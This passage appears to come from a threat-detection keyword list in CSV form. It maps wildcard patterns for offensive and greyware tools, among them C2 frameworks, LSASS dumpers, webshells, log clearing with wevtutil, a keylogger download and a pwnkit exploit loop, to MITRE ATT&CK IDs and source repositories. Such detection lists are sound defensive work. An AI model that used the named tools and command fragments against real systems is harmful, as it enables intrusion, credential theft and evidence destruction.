its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*we.exe -s rssocks -d *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*weak1337/Alcatraz*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*weakpass.com/crack-js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass.com/generate*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential 
Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass/crack-js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass-main.*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*web_cloner/interceptor*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*WebBrowserPassView.exe*,offensive_tool_keyword,webBrowserPassView,WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/web_browser_password.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WebBrowserPassView.zip*,offensive_tool_keyword,webBrowserPassView,WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. 
This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/web_browser_password.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*webcamsnap -v*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*webclientservicescanner -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WebDavC2*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*webdavC2.py*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*WebDavC2-master.zip*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*webdavC2server.py*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*WebDeveloperSecurityChecklist*,offensive_tool_keyword,WebDeveloperSecurityChecklist,A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist,1,0,N/A,N/A,5,406,59,2021-05-10T07:48:47Z,2017-05-16T20:31:38Z -*web-hacking-toolkit.git*,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,1,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z -*webshell http*/tomcatwar.jsp?cmd=*,offensive_tool_keyword,Spring4Shell,CVE-2022-22965 - CVE-2010-1622 redux,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DDuarte/springshell-rce-poc,1,0,N/A,N/A,1,21,12,2023-04-18T14:15:42Z,2022-03-31T08:06:46Z -*webshell_execute*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*webshell-exegol.php*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weevely generate 
*.php*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weevely https://*.php * id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weird status:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Welcome to OpenBullet 2*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*wePWNise*,offensive_tool_keyword,wePWNise,wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. 
Cobalt Strike) and it also accepts any custom payload in raw format.,T1203 - T1059 - T1564.001,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/FSecureLABS/wePWNise,1,0,N/A,N/A,4,351,107,2018-08-27T22:00:25Z,2016-11-09T11:01:11Z -*werdhaihai/AtlasReaper*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*werfault_shtinkering*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*werfault_silent_process_exit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*WerTrigger.exe*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z -*WerTrigger-master*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z -*wevtutil cl *,greyware_tool_keyword,wevtutil,adversaries can delete specific event logs or clear their contents. 
erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wfencode -*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfencode -e *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z 
-*wfencode.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfencode.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload -*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*WfpEscalation.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*WfpTokenDup.exe -*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*wfuzz --*.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.get_payload*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information 
Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz/wordlist*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wfuzz-cli.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzzp.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wgen.py*,offensive_tool_keyword,Python-Wordlist-Generator,Create awesome wordlists with Python.,T1110 - T1588 - T1602,TA0001 - TA0006,N/A,N/A,Credential Access,https://github.com/agusmakmun/Python-Wordlist-Generator,1,0,N/A,N/A,1,96,37,2019-06-12T13:23:17Z,2015-05-22T12:32:01Z -*wget *http-vuln-cve2020-5902.nse*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wget* -O les.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*wget*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band 
interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Wh04m1001/DFSCoerce*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*wh0amitz/BypassCredGuard*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*wh0amitz/S4UTomato*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*Wh1t3Fox/polenum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WhatBreach*,offensive_tool_keyword,WhatBreach,WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:,T1593.001 - T1593.002 - T1593.003,TA0010 - TA0011 - ,N/A,N/A,Information Gathering,https://github.com/Ekultek/WhatBreach,1,0,N/A,N/A,10,945,152,2023-05-22T21:57:04Z,2019-04-19T20:40:19Z -*whatlicense-main.zip*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*whereami.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*whereami.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*WheresMyImplant.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*WheresMyImplant.git*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*WheresMyImplant.sln*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*while * do mv *GCONV_PATH=./value* done,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034 ,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*Whirlpool-Orig-512.verified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z 